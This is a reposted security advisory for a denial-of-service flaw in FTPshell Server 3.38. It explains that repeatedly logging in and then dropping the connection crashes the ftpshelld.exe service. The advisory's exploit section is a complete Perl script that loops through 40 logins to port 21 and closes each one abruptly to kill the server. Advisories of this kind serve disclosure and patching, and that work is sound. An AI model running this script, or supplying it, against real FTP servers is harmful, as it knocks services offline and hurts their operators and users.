FTPshell Server DoSSummary
"FTPShell server is a windows FTP service that enables remote file downloads and uploads."
Due to improper freeing of resources allows attackers to cause the FTPshell Server to crash.
Credit:
The information has been provided by Reed Arvin .
The original article can be found at: http://reedarvin.thearvins.com/20050725-01.html
Details
Vulnerable Systems:
* FTPshell Server Version 3.38
Logging into the FTP server successfully and then abruptly closing the connection (without using the QUIT command) more than 39 times in succession will cause the ftpshelld.exe process to die.
Exploit:
#===== Start FTPShell_FTPDOS.pl =====
#
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
# FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################
use IO::Socket;
use Win32;
use strict;
my($i) = "";
my($socket) = "";
for ($i = 1; $i <= 40; $i++)
{
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Login \#$i\n";
Win32::Sleep(300);
print $socket "USER $ARGV[1]\r\n";
Win32::Sleep(100);
print $socket "PASS $ARGV[2]\r\n";
Win32::Sleep(100);
print $socket "PORT 127,0,0,1,18,12\r\n";
Win32::Sleep(100);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
}
#===== Start FTPShell_FTPDOS.pl =====
推荐
评论(0条)
